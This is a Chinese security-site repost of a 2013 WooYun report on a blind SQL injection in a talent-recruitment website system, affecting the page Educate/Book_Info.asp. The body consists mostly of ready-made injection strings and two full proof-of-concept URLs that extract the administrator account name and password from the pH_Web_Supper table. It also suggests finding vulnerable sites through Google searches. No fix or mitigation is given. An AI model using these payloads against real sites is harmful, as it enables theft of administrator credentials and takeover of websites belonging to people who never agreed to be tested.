热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

国内人才网站系统存在盲注漏洞

发布时间:2013-03-27 22:44文章来源:wooyun文章作者:小菜望逆袭 点击次数:
摘要:漏洞作者: 小菜望逆袭 提交时间: 2013-02-10 公开时间: 2013-03-27 漏洞类型: SQL注射漏洞 详细说明: 目前国内所使用的人才网站系统存在盲注漏洞。。。 漏洞页面:Educate/Book_Info.asp 谷歌下你就知道。。 查询管理账号:+aNd+0=(selEct+toP+1+su_Sup...

漏洞作者: 小菜望逆袭

提交时间: 2013-02-10
公开时间: 2013-03-27

漏洞类型: SQL注射漏洞

详细说明:

目前国内所使用的人才网站系统存在盲注漏洞。。。
漏洞页面:Educate/Book_Info.asp 谷歌下你就知道。。

查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
漏洞证明:

爆管理账号:
http://job.xxx.com.cn/educate/Book_Info.asp?Param=4+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

 

国内人才网站系统存在盲注漏洞


爆管理密码:
http://job.xxx.com.cn/educate/Book_Info.asp?Param=4+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

 

国内人才网站系统存在盲注漏洞

 

还有很多,就不一一贴出来了。

标签分类:

上一篇:ISHOP商场建站系统sql注入漏洞
下一篇:智思留言本4.1正式版上传漏洞